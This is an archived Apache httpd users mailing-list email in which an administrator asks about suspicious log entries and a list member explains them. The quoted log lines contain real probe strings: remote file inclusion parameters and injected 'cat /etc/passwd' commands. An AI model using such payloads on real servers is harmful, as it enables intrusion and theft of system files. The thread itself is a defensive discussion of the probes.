From users-return-108535-apmail-httpd-users-archive=httpd.apache.org@httpd.apache.org Wed Feb 12 16:44:28 2014 Return-Path: X-Original-To: apmail-httpd-users-archive@www.apache.org Delivered-To: apmail-httpd-users-archive@www.apache.org Received: from mail.apache.org (hermes.apache.org [140.211.11.3]) by minotaur.apache.org (Postfix) with SMTP id E454A1083D for ; Wed, 12 Feb 2014 16:44:28 +0000 (UTC) Received: (qmail 59901 invoked by uid 500); 12 Feb 2014 16:44:17 -0000 Delivered-To: apmail-httpd-users-archive@httpd.apache.org Received: (qmail 59820 invoked by uid 500); 12 Feb 2014 16:44:16 -0000 Mailing-List: contact users-help@httpd.apache.org; run by ezmlm Precedence: bulk Reply-To: users@httpd.apache.org list-help: list-unsubscribe: List-Post: List-Id: Delivered-To: mailing list users@httpd.apache.org Received: (qmail 59783 invoked by uid 99); 12 Feb 2014 16:44:15 -0000 Received: from nike.apache.org (HELO nike.apache.org) (192.87.106.230) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Feb 2014 16:44:15 +0000 X-ASF-Spam-Status: No, hits=2.1 required=5.0 tests=FREEMAIL_ENVFROM_END_DIGIT,FROM_LOCAL_HEX,HTML_MESSAGE,RCVD_IN_DNSWL_LOW,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of rb1223334444@gmail.com designates 209.85.212.178 as permitted sender) Received: from [209.85.212.178] (HELO mail-wi0-f178.google.com) (209.85.212.178) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 12 Feb 2014 16:44:09 +0000 Received: by mail-wi0-f178.google.com with SMTP id cc10so7212345wib.17 for ; Wed, 12 Feb 2014 08:43:49 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; bh=uH69pqjt3ZZdaPEwXYYpyC/ge/mKNvigj5nNEGHwHps=; b=Cjgqpv4oE38Fmj2YbJ6LcVDl+iWSImwF58lK3iGL7j9HCzRo1JIkTj733IazPB3ilh Pcz+Q5kApZd7C5wFnf1dm4CZ/GXU02KuQ4OM+yHwCe8rnM20PXUzT+houm5lXBj9quG8 9Fhs9XjSXluey3cPFnxDROElfVUN/Y0Uys05zbeQh0EjQ7lyHEHOrrWVaZUqRReRITaM 4r9ZsmPLPHZROOFYDJ9mWpnGpcODKYVRBB+8wbieDJmW0n/ZJsQ+0h5wyuSSLO4/eVw9 zwA2454l4yTCYDrEOeTP18snmwn2cJZhn2sRe0b0wKs26zPD/Ja5T95mvpfiFFd8zRpq WwAg== MIME-Version: 1.0 X-Received: by 10.194.109.68 with SMTP id hq4mr31054013wjb.12.1392223429586; Wed, 12 Feb 2014 08:43:49 -0800 (PST) Received: by 10.227.153.194 with HTTP; Wed, 12 Feb 2014 08:43:49 -0800 (PST) In-Reply-To: <52FBA131.1010707@knutejohnson.com> References: <52FB9A18.4020303@knutejohnson.com> <52FBA131.1010707@knutejohnson.com> Date: Wed, 12 Feb 2014 22:13:49 +0530 Message-ID: From: rahul bhola To: users@httpd.apache.org Content-Type: multipart/alternative; boundary=089e0102e6daf820ed04f2384671 X-Virus-Checked: Checked by ClamAV on apache.org Subject: Re: [users@httpd] Possible exploit? --089e0102e6daf820ed04f2384671 Content-Type: text/plain; charset=ISO-8859-1 because of HTTP Response 302 a safe bet would be to say he didnt get anything still i would recommend you to sanitize the data u get from parameter command and cmd. Also simply go to the url to see what he saw On Wed, Feb 12, 2014 at 9:58 PM, Knute Johnson wrote: > On 2/12/2014 08:04, rahul bhola wrote: > >> in first and last casehe was checking if it is possible to pass shell >> commands throught command or cmd parameter.not sure on second one but it >> looks like he was testing for unsanitized url redirection vul. >> >> >> On Wed, Feb 12, 2014 at 9:28 PM, Knute Johnson > > wrote: >> >> I found the following in my log this morning. Does anybody know >> what it really means? Thanks. >> >> A total of 3 possible successful probes were detected (the >> following URLs >> contain strings that match one or more of a listing of strings that >> indicate a possible exploit): >> >> >> /user.php?caselist[bad_file.__txt][path]=http://www.google._ >> _com/humans.txt?&command=cat%__20/etc/passwd >> HTTP >> Response 302 >> >> /sid=__XXXXXXXXXXXXXXXXXXXXXXXXXXXX&__shopid=http://www.google.com/ >> __humans.txt >> ? HTTP Response 302 >> >> /gepi/gestion/savebackup.php?__filename=http://www.google.__ >> com/humans.txt?&cmd=cat/etc/__passwd >> >> HTTP Response >> 302 >> >> >> -- >> >> Knute Johnson >> >> ------------------------------__---------------------------- >> --__--------- >> To unsubscribe, e-mail: users-unsubscribe@httpd.__apache.org >> >> >> For additional commands, e-mail: users-help@httpd.apache.org >> >> >> >> >> >> >> -- >> Rahul Bhola >> B.E. >> computers >> Core Member >> Department of backstage >> Bits Pilani KK Birla Goa Campus >> > > So you think he was trying to get the content of my passwd file? So what > would that get him? > > Is it possible to do this myself to see what he could have gotten? > > Thanks, > > > -- > > Knute Johnson > > --------------------------------------------------------------------- > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org > For additional commands, e-mail: users-help@httpd.apache.org > > -- Rahul Bhola B.E. computers Core Member Department of backstage Bits Pilani KK Birla Goa Campus --089e0102e6daf820ed04f2384671 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable
because of HTTP Response 302 a safe bet would be to s= ay he didnt get anything still i would recommend you to sanitize the data u= get from parameter command and cmd.
Also simply go to the url to = see what he saw


On Wed,= Feb 12, 2014 at 9:58 PM, Knute Johnson <apache@knutejohnson.com= > wrote:
On 2/12/2014 08:04, rahul bh= ola wrote:
in first and last casehe was checking if it is possible to pass shell
commands throught command or cmd parameter.not sure on second one but it looks like he was testing for unsanitized url redirection vul.


On Wed, Feb 12, 2014 at 9:28 PM, Knute Johnson <apache@knutejohnson.com
<= div class=3D""> <mailto:apa= che@knutejohnson.com>> wrote:

=A0 =A0 I found the following in my log this morning. =A0Does anybody know<= br> =A0 =A0 what it really means? =A0Thanks.

=A0 =A0 =A0 A total of 3 possible successful probes were detected (the
=A0 =A0 following URLs
=A0 =A0 =A0 contain strings that match one or more of a listing of strings = that
=A0 =A0 =A0 indicate a possible exploit):


=A0 =A0 /user.php?caselist[bad_file.__txt][path]=3Dhttp://www.google.__com/humans.t= xt?&command=3Dcat%__20/etc/passwd
=A0 =A0 <http://www.google.com/humans.txt?&a= mp;command=3Dcat%20/etc/passwd> HTTP
=A0 =A0 Response 302

=A0 =A0 /sid=3D__XXXXXXXXXXXXXXXXXXXXXXXXXXXX&__shopid=3D= http://www= .google.com/__humans.txt
=A0 =A0 <= http://www.google.com/humans.txt>? HTTP Response 302

=A0 =A0 /gepi/gestion/savebackup.php?__filename=3Dhttp://www.google.__com/humans.tx= t?&cmd=3Dcat/etc/__passwd

=A0 =A0 <http://www.google.com/humans.txt?&cmd= =3Dcat/etc/passwd> HTTP Response 302


=A0 =A0 --

=A0 =A0 Knute Johnson

=A0 =A0 ------------------------------__----------------------------= --__---------
=A0 =A0 To unsubscribe, e-mail: users-unsubscribe@httpd.__apache.org
=A0 =A0 <mailto:users-unsubscribe@httpd.apache.org>

=A0 =A0 For additional commands, e-mail: users-help@httpd.apache.org
=A0 =A0 <mailto:users-help@httpd.apache.org>





--
Rahul Bhola
B.E.
computers
Core Member
Department of backstage
Bits Pilani KK Birla Goa Campus

So you think he was trying to get the content of my passwd file? =A0So what= would that get him?

Is it possible to do this myself to see what he could have gotten?

Thanks,


--

Knute Johnson

-------------------------------------------------------------= --------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org




--
Rahul Bhola=
B.E.
computers
Core Member
Department of backstage
Bits Pil= ani KK Birla Goa Campus
--089e0102e6daf820ed04f2384671--